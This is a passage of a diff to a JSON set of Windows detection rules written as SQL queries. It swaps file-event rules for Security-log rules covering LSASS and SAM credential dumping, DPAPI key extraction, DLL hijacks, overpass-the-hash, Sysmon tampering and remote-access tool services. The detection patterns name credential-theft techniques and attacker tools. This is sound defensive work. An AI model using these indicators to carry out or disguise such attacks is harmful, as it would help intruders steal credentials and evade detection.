(TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.cmd' ESCAPE '\\' OR TargetFilename LIKE '%.cpl' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.iso' ESCAPE '\\' OR TargetFilename LIKE '%.lnk' ESCAPE '\\' OR TargetFilename LIKE '%.msi' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.psm1' ESCAPE '\\' OR TargetFilename LIKE '%.scr' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\')) AND NOT (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND (TargetFilename LIKE 
'%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\LocalLow\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4738' AND NOT (AllowedToDelegateTo = '-' OR AllowedToDelegateTo = '')) OR ((EventID = '5136' AND AttributeLDAPDisplayName = 'msDS-AllowedToDelegateTo') OR (EventID = '5136' AND ObjectClass = 'user' AND AttributeLDAPDisplayName = 'servicePrincipalName') OR (EventID = '5136' AND AttributeLDAPDisplayName = 'msDS-AllowedToActOnBehalfOfOtherIdentity'))))" ], - "filename": "file_event_win_new_files_in_uncommon_appdata_folder.yml" + "filename": "win_security_alert_ad_user_backdoors.yml" }, { - "title": "Potential Remote Credential Dumping Activity", - "id": "6e2a900a-ced9-4e4a-a9c2-13e706f9518a", - "status": "experimental", - "description": "Detects default filenames output from the execution of CrackMapExec and Impacket-secretsdump against an endpoint.", - "author": "SecurityAura", + "title": "User Added to Local Administrators", + "id": "c265cf08-3f99-46c1-8d59-328247057d57", + "status": "stable", + "description": "This rule triggers on user accounts that are added to the local Administrators group, which could be legitimate activity or a sign of privilege escalation activity", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003" + "attack.privilege_escalation", + "attack.t1078", + "attack.persistence", + "attack.t1098" ], "falsepositives": [ - "Unknown" + "Legitimate administrative activity" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND TargetFilename REGEXP '\\\\Windows\\\\System32\\\\[a-zA-Z0-9]{8}\\.tmp$')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4732' AND (TargetUserName LIKE 'Administr%' ESCAPE '\\' OR TargetSid = 'S-1-5-32-544')) AND NOT (SubjectUserName LIKE 
'%$' ESCAPE '\\'))" ], - "filename": "file_event_win_remote_cred_dump.yml" + "filename": "win_security_user_added_to_local_administrators.yml" }, { - "title": "PsExec Service File Creation", - "id": "259e5a6a-b8d2-4c38-86e2-26c5e651361d", + "title": "T1047 Wmiprvse Wbemcomn DLL Hijack", + "id": "f6c68d5f-e101-4b86-8c84-7d96851fd65c", "status": "test", - "description": "Detects default PsExec service filename which indicates PsExec service installation and execution", - "author": "Thomas Patzke", + "description": "Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\\Windows\\System32\\wbem\\` directory over the network for a WMI DLL Hijack scenario.", + "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR)", "tags": [ "attack.execution", - "attack.t1569.002", - "attack.s0029" + "attack.t1047", + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ "Unknown" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE TargetFilename LIKE '%\\\\PSEXESVC.exe' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND RelativeTargetName LIKE '%\\\\wbem\\\\wbemcomn.dll' ESCAPE '\\') AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" ], - "filename": "file_event_win_tool_psexec.yml" + "filename": "win_security_wmiprvse_wbemcomn_dll_hijack.yml" }, { - "title": "Suspicious DotNET CLR Usage Log Artifact", - "id": "e0b06658-7d1d-4cd3-bf15-03467507ff7c", + "title": "PetitPotam Suspicious Kerberos TGT Request", + "id": "6a53d871-682d-40b6-83e0-b7c1a6c4e3a5", "status": "experimental", - "description": "Detects the creation of Usage Log files by the CLR (clr.dll). 
These files are named after the executing process once the assembly is finished executing for the first time in the (user) session context.", - "author": "frack113, omkar72, oscd.community, Wojciech Lesicki", + "description": "Detect suspicious Kerberos TGT requests.\nOnce an attacer obtains a computer certificate by abusing Active Directory Certificate Services in combination with PetitPotam, the next step would be to leverage the certificate for malicious purposes.\nOne way of doing this is to request a Kerberos Ticket Granting Ticket using a tool like Rubeus.\nThis request will generate a 4768 event with some unusual fields depending on the environment.\nThis analytic will require tuning, we recommend filtering Account_Name to the Domain Controller computer accounts.\n", + "author": "Mauricio Velazco, Michael Haag", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.credential_access", + "attack.t1187" ], "falsepositives": [ - "Rundll32.exe with zzzzInvokeManagedCustomActionOutOfProc in command line and msiexec.exe as parent process - https://twitter.com/SBousseaden/status/1388064061087260675" + "False positives are possible if the environment is using certificates for authentication. We recommend filtering Account_Name to the Domain Controller computer accounts." 
], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\UsageLogs\\\\cmstp.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\cscript.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\mshta.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\msxsl.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\regsvr32.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\rundll32.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\svchost.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\wscript.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\wmic.exe.log' ESCAPE '\\') AND NOT ((ParentProcessName LIKE '%\\\\MsiExec.exe' ESCAPE '\\' AND ParentCommandLine LIKE '% -Embedding%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND CommandLine LIKE '%Temp%' ESCAPE '\\' AND CommandLine LIKE '%zzzzInvokeManagedCustomActionOutOfProc%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4768' AND TargetUserName LIKE '%$' ESCAPE '\\' AND CertThumbprint LIKE '%' ESCAPE '\\') AND NOT ((IpAddress = '::1') OR (CertThumbprint = '')))" ], - "filename": "file_event_win_net_cli_artefact.yml" + "filename": "win_security_petitpotam_susp_tgt_request.yml" }, { - "title": "Potential DCOM InternetExplorer.Application DLL Hijack", - "id": "2f7979ae-f82b-45af-ac1d-2b10e93b0baa", + "title": "Successful Overpass the Hash Attempt", + "id": "192a0330-c20b-4356-90b6-7b7049ae0b87", "status": "test", - "description": "Detects potential DLL hijack of \"iertutil.dll\" found in the DCOM InternetExplorer.Application Class over the network", - "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR), wagga", + "description": "Detects successful logon with logon type 9 (NewCredentials) which matches the Overpass the Hash behavior of e.g Mimikatz's sekurlsa::pth module.", + "author": "Roberto Rodriguez (source), Dominik Schaudel 
(rule)", "tags": [ "attack.lateral_movement", - "attack.t1021.002", - "attack.t1021.003" + "attack.s0002", + "attack.t1550.002" + ], + "falsepositives": [ + "Runas command-line tool using /netonly parameter" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '9' AND LogonProcessName = 'seclogo' AND AuthenticationPackageName = 'Negotiate')" + ], + "filename": "win_security_overpass_the_hash.yml" + }, + { + "title": "SCM Database Privileged Operation", + "id": "dae8171c-5ec6-4396-b210-8466585b53e9", + "status": "test", + "description": "Detects non-system users performing privileged operation os the SCM database", + "author": "Roberto Rodriguez @Cyb3rWard0g, Tim Shelton", + "tags": [ + "attack.privilege_escalation", + "attack.t1548" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName = 'System' AND TargetFilename LIKE '%\\\\Internet Explorer\\\\iertutil.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4674' AND ObjectType LIKE 'SC\\_MANAGER OBJECT' ESCAPE '\\' AND ObjectName = 'servicesactive' AND PrivilegeList = 'SeTakeOwnershipPrivilege') AND NOT (SubjectLogonId = '0x3e4' AND ProcessName LIKE '%:\\\\Windows\\\\System32\\\\services.exe' ESCAPE '\\'))" ], - "filename": "file_event_win_dcom_iertutil_dll_hijack.yml" + "filename": "win_security_scm_database_privileged_operation.yml" }, { - "title": "Suspicious Desktopimgdownldr Target File", - "id": "fc4f4817-0c53-4683-a4ee-b17a64bc1039", + "title": "Kerberos Manipulation", + "id": "f7644214-0eb0-4ace-9455-331ec4c09253", "status": "test", - "description": "Detects a suspicious Microsoft desktopimgdownldr file creation that stores a file to a suspicious location or contains a file with a suspicious extension", + "description": "This method triggers on rare Kerberos Failure Codes caused by manipulations of Kerberos messages", "author": 
"Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1105" + "attack.credential_access", + "attack.t1212" ], "falsepositives": [ - "False positives depend on scripts and administrative tools used in the monitored environment" + "Faulty legacy applications" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (((NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Personalization\\\\LockScreenImage\\\\%' ESCAPE '\\') AND NOT (TargetFilename LIKE '%C:\\\\Windows\\\\%' ESCAPE '\\')) AND NOT ((TargetFilename LIKE '%.jpg%' ESCAPE '\\' OR TargetFilename LIKE '%.jpeg%' ESCAPE '\\' OR TargetFilename LIKE '%.png%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('675', '4768', '4769', '4771') AND FailureCode IN ('0x9', '0xA', '0xB', '0xF', '0x10', '0x11', '0x13', '0x14', '0x1A', '0x1F', '0x21', '0x22', '0x23', '0x24', '0x26', '0x27', '0x28', '0x29', '0x2C', '0x2D', '0x2E', '0x2F', '0x31', '0x32', '0x3E', '0x3F', '0x40', '0x41', '0x43', '0x44'))" ], - "filename": "file_event_win_susp_desktopimgdownldr_file.yml" + "filename": "win_security_susp_kerberos_manipulation.yml" }, { - "title": "PowerShell Profile Modification", - "id": "b5b78988-486d-4a80-b991-930eff3ff8bf", + "title": "Sysmon Channel Reference Deletion", + "id": "18beca67-ab3e-4ee3-ba7a-a46ca8d7d0cc", "status": "test", - "description": "Detects the creation or modification of a powershell profile which could indicate suspicious activity as the profile can be used as a mean of persistence", - "author": "HieuTT35, Nasreddine Bencherchali", + "description": "Potential threat actor tampering with Sysmon manifest and eventually disabling it", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1546.013" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ - "System administrator creating Powershell profile 
manually" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\Microsoft.PowerShell\\_profile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WindowsPowerShell\\\\profile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerShell\\\\profile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\profile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Program Files\\\\PowerShell\\\\7\\\\profile.ps1' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4657' AND (ObjectName LIKE '%WINEVT\\\\Publishers\\\\{5770385f-c22a-43e0-bf4c-06f5698ffbd9}%' ESCAPE '\\' OR ObjectName LIKE '%WINEVT\\\\Channels\\\\Microsoft-Windows-Sysmon/Operational%' ESCAPE '\\') AND ObjectValueName = 'Enabled' AND NewValue = '0') OR (EventID = '4663' AND (ObjectName LIKE '%WINEVT\\\\Publishers\\\\{5770385f-c22a-43e0-bf4c-06f5698ffbd9}%' ESCAPE '\\' OR ObjectName LIKE '%WINEVT\\\\Channels\\\\Microsoft-Windows-Sysmon/Operational%' ESCAPE '\\') AND AccessMask = '65536')))" ], - "filename": "file_event_win_susp_powershell_profile.yml" + "filename": "win_security_sysmon_channel_reference_deletion.yml" }, { - "title": "Typical HiveNightmare SAM File Export", - "id": "6ea858a8-ba71-4a12-b2cc-5d83312404c7", + "title": "DPAPI Domain Backup Key Extraction", + "id": "4ac1f50b-3bd0-4968-902d-868b4647937e", "status": "test", - "description": "Detects files written by the different tools that exploit HiveNightmare", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects tools extracting LSA secret DPAPI domain backup key from Domain Controllers", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ "attack.credential_access", - "attack.t1552.001", - "cve.2021.36934" + "attack.t1003.004" ], "falsepositives": [ - "Files that accidentally contain these strings" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\hive\\_sam\\_%' ESCAPE '\\' OR 
TargetFilename LIKE '%\\\\SAM-2021-%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM-2022-%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM-2023-%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM-haxx%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Sam.save%' ESCAPE '\\') OR TargetFilename LIKE 'C:\\\\windows\\\\temp\\\\sam' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4662' AND ObjectType = 'SecretObject' AND AccessMask = '0x2' AND ObjectName LIKE '%BCKUPKEY%' ESCAPE '\\')" ], - "filename": "file_event_win_hktl_hivenightmare_file_exports.yml" + "filename": "win_security_dpapi_domain_backupkey_extraction.yml" }, { - "title": "LSASS Memory Dump File Creation", - "id": "5e3d3601-0662-4af0-b1d2-36a05e90c40a", - "status": "test", - "description": "LSASS memory dump creation using operating systems utilities. Procdump will use process name in output file if no name is specified", - "author": "Teymur Kheirkhabarov, oscd.community", + "title": "RDP over Reverse SSH Tunnel WFP", + "id": "5bed80b6-b3e8-428e-a3ae-d3c757589e41", + "status": "experimental", + "description": "Detects svchost hosting RDP termsvcs communicating with the loopback address", + "author": "Samir Bousseaden", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.command_and_control", + "attack.lateral_movement", + "attack.t1090.001", + "attack.t1090.002", + "attack.t1021.001", + "car.2013-07-002" ], "falsepositives": [ - "Dumping lsass memory for forensic investigation purposes by legitimate incident responder or forensic invetigator", - "Dumps of another process that contains lsass in its process name (substring)" + "Programs that connect locally to the RDP port" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%lsass%' ESCAPE '\\' AND TargetFilename LIKE '%dmp' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5156' AND ((SourcePort = '3389' AND (DestAddress LIKE '127.%' 
ESCAPE '\\' OR DestAddress LIKE '::1' ESCAPE '\\')) OR (DestPort = '3389' AND (SourceAddress LIKE '127.%' ESCAPE '\\' OR SourceAddress LIKE '::1' ESCAPE '\\')))) AND NOT ((FilterOrigin = 'AppContainer Loopback') OR ((Application LIKE '%\\\\thor.exe' ESCAPE '\\' OR Application LIKE '%\\\\thor64.exe' ESCAPE '\\'))))" ], - "filename": "file_event_win_lsass_memory_dump_file_creation.yml" + "filename": "win_security_rdp_reverse_tunnel.yml" }, { - "title": "GatherNetworkInfo.VBS Reconnaissance Script Output", - "id": "f92a6f1e-a512-4a15-9735-da09e78d7273", - "status": "experimental", - "description": "Detects creation of files which are the results of executing the built-in reconnaissance script \"C:\\Windows\\System32\\gatherNetworkInfo.vbs\".", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Active Directory Replication from Non Machine Account", + "id": "17d619c1-e020-4347-957e-1d1207455c93", + "status": "test", + "description": "Detects potential abuse of Active Directory Replication Service (ADRS) from a non machine account to request credentials.", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.discovery" + "attack.credential_access", + "attack.t1003.006" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\config%' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\Hotfixinfo.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\netiostate.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sysportslog.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\VmSwitchLog.evtx' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4662' AND AccessMask = '0x100' AND (Properties LIKE '%1131f6aa-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR Properties LIKE '%1131f6ad-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR Properties LIKE '%89e95b76-444d-4c62-991a-0facbeda640c%' ESCAPE '\\')) AND NOT (SubjectUserName LIKE '%$' ESCAPE 
'\\' OR SubjectUserName LIKE 'MSOL\\_%' ESCAPE '\\'))" ], - "filename": "file_event_win_lolbin_gather_network_info_script_output.yml" + "filename": "win_security_ad_replication_non_machine_account.yml" }, { - "title": "Suspicious Screensaver Binary File Creation", - "id": "97aa2e88-555c-450d-85a6-229bcd87efb8", + "title": "Suspicious Remote Logon with Explicit Credentials", + "id": "941e5c45-cda7-4864-8cea-bbb7458d194a", "status": "experimental", - "description": "Adversaries may establish persistence by executing malicious content triggered by user inactivity.\nScreensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension\n", - "author": "frack113", + "description": "Detects suspicious processes logging on with explicit credentials", + "author": "oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, Tim Shelton", "tags": [ - "attack.persistence", - "attack.t1546.002" + "attack.t1078", + "attack.lateral_movement" ], "falsepositives": [ - "Unknown" + "Administrators that use the RunAS command or scheduled tasks" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%.scr' ESCAPE '\\' AND NOT (((NewProcessName LIKE '%\\\\Kindle.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Bin\\\\ccSvcHst.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\TiWorker.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\uwfservicingscr.scr' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4648' AND (ProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\winrs.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\net1.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\reg.exe' ESCAPE '\\')) AND NOT ((TargetServerName = 'localhost') 
OR (SubjectUserName LIKE '%$' ESCAPE '\\' AND TargetUserName LIKE '%$' ESCAPE '\\')))" ], - "filename": "file_event_win_creation_scr_binary_file.yml" + "filename": "win_security_susp_logon_explicit_credentials.yml" }, { - "title": "Wmiexec Default Output File", - "id": "8d5aca11-22b3-4f22-b7ba-90e60533e1fb", + "title": "Remote Access Tool Services Have Been Installed - Security", + "id": "c8b00925-926c-47e3-beea-298fd563728e", "status": "experimental", - "description": "Detects the creation of the default output filename used by the wmiexec tool", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects service installation of different remote access tools software. These software are often abused by threat actors to perform", + "author": "Connor Martin, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1047" + "attack.persistence", + "attack.t1543.003", + "attack.t1569.002" ], "falsepositives": [ - "Unlikely" + "The rule doesn't look for anything suspicious so false positives are expected. 
If you use one of the tools mentioned, comment it out" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename REGEXP '\\\\Windows\\\\__1\\d{9}\\.\\d{1,7}$' OR TargetFilename REGEXP 'C:\\\\__1\\d{9}\\.\\d{1,7}$' OR TargetFilename REGEXP 'D:\\\\__1\\d{9}\\.\\d{1,7}$')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ServiceFileName LIKE '%SSUService%' ESCAPE '\\' OR ServiceFileName LIKE '%SplashtopRemoteService%' ESCAPE '\\' OR ServiceFileName LIKE '%Atera%' ESCAPE '\\' OR ServiceFileName LIKE '%LogMeIn%' ESCAPE '\\' OR ServiceFileName LIKE '%LMIGuardianSvc%' ESCAPE '\\' OR ServiceFileName LIKE '%TeamViewer%' ESCAPE '\\' OR ServiceFileName LIKE '%RPCService%' ESCAPE '\\' OR ServiceFileName LIKE '%RPCPerformanceService%' ESCAPE '\\' OR ServiceFileName LIKE '%BASupportExpressStandaloneService%' ESCAPE '\\' OR ServiceFileName LIKE '%BASupportExpressSrvcUpdater%' ESCAPE '\\' OR ServiceFileName LIKE '%GoToMyPC%' ESCAPE '\\' OR ServiceFileName LIKE '%monblanking%' ESCAPE '\\' OR ServiceFileName LIKE '%RManService%' ESCAPE '\\' OR ServiceFileName LIKE '%GoToAssist%' ESCAPE '\\' OR ServiceFileName LIKE '%AmmyyAdmin%' ESCAPE '\\' OR ServiceFileName LIKE '%vncserver%' ESCAPE '\\' OR ServiceFileName LIKE '%Parsec%' ESCAPE '\\' OR ServiceFileName LIKE '%chromoting%' ESCAPE '\\' OR ServiceFileName LIKE '%Zoho%' ESCAPE '\\' OR ServiceFileName LIKE '%jumpcloud%' ESCAPE '\\'))" ], - "filename": "file_event_win_wmiexec_default_filename.yml" + "filename": "win_security_service_install_remote_access_software.yml" }, { - "title": "Suspicious Binary Writes Via AnyDesk", - "id": "2d367498-5112-4ae5-a06a-96e7bc33a211", - "status": "experimental", - "description": "Detects AnyDesk writing binary files to disk other than \"gcapi.dll\".\nAccording to RedCanary research it is highly abnormal for AnyDesk to write executable files to disk besides gcapi.dll,\nwhich is a legitimate DLL that is part of the Google Chrome web 
browser used to interact with the Google Cloud API. (See reference section for more details)\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "HybridConnectionManager Service Installation", + "id": "0ee4d8a5-4e67-4faf-acfa-62a78457d1f2", + "status": "test", + "description": "Rule to detect the Hybrid Connection Manager service installation.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.persistence", + "attack.t1554" ], "falsepositives": [ - "Unknown" + "Legitimate use of Hybrid Connection Manager via Azure function apps." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\anydesk.exe' ESCAPE '\\' AND (TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\')) AND NOT ((TargetFilename LIKE '%\\\\gcapi.dll' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceName = 'HybridConnectionManager' AND ServiceFileName LIKE '%HybridConnectionManager%' ESCAPE '\\')" ], - "filename": "file_event_win_anydesk_writing_susp_binaries.yml" + "filename": "win_security_hybridconnectionmgr_svc_installation.yml" }, { - "title": "UAC Bypass Using .NET Code Profiler on MMC", - "id": "93a19907-d4f9-4deb-9f91-aac4692776a6", + "title": "PowerShell Scripts Installed as Services - Security", + "id": "2a926e6a-4b81-4011-8a96-e36cc8c04302", "status": "test", - "description": "Detects the pattern of UAC Bypass using .NET Code Profiler and mmc.exe DLL hijacking (UACMe 39)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects powershell script installed as a Service", + "author": "oscd.community, Natalia Shornikova", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.execution", + "attack.t1569.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE 
(TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\pe386.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ServiceFileName LIKE '%powershell%' ESCAPE '\\' OR ServiceFileName LIKE '%pwsh%' ESCAPE '\\'))" ], - "filename": "file_event_win_uac_bypass_dotnet_profiler.yml" + "filename": "win_security_powershell_script_installed_as_service.yml" }, { - "title": "Potential Persistence Via Outlook Form", - "id": "c3edc6a5-d9d4-48d8-930e-aab518390917", - "status": "experimental", - "description": "Detects the creation of a new Outlook form which can contain malicious code", - "author": "Tobias Michalski (Nextron Systems)", + "title": "Secure Deletion with SDelete", + "id": "39a80702-d7ca-4a83-b776-525b1f86a36d", + "status": "test", + "description": "Detects renaming of file while deletion with SDelete tool.", + "author": "Thomas Patzke", "tags": [ - "attack.persistence", - "attack.t1137.003" + "attack.impact", + "attack.defense_evasion", + "attack.t1070.004", + "attack.t1027.005", + "attack.t1485", + "attack.t1553.002", + "attack.s0195" ], "falsepositives": [ - "Legitimate use of outlook forms" + "Legitimate usage of SDelete" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\FORMS\\\\IPM%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Local Settings\\\\Application Data\\\\Microsoft\\\\Forms%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4656', '4663', '4658') AND (ObjectName LIKE '%.AAA' ESCAPE '\\' OR ObjectName LIKE '%.ZZZ' ESCAPE '\\'))" ], - "filename": "file_event_win_office_outlook_newform.yml" + "filename": "win_security_susp_sdelete.yml" }, { - "title": "Potential SAM Database Dump", - "id": "4e87b8e2-2ee9-4b2a-a715-4727d297ece0", + "title": "Invoke-Obfuscation CLIP+ Launcher - Security", + 
"id": "4edf51e1-cb83-4e1a-bc39-800e396068e3", "status": "experimental", - "description": "Detects the creation of files that look like exports of the local SAM (Security Account Manager)", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.002" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Rare cases of administrative activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\Temp\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.sav' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Intel\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.hive' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Perflogs\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ProgramData\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Users\\\\Public\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Local\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\_ShadowSteal.zip' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Documents\\\\SAM.export' ESCAPE '\\' OR TargetFilename LIKE '%:\\\\sam' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\hive\\_sam\\_%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.save%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.export%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\~reg\\_sam.save%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam\\_backup%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.bck%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.backup%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%&&%' ESCAPE '\\' AND ServiceFileName LIKE '%clipboard]::%' ESCAPE '\\')" ], - "filename": "file_event_win_sam_dump.yml" + 
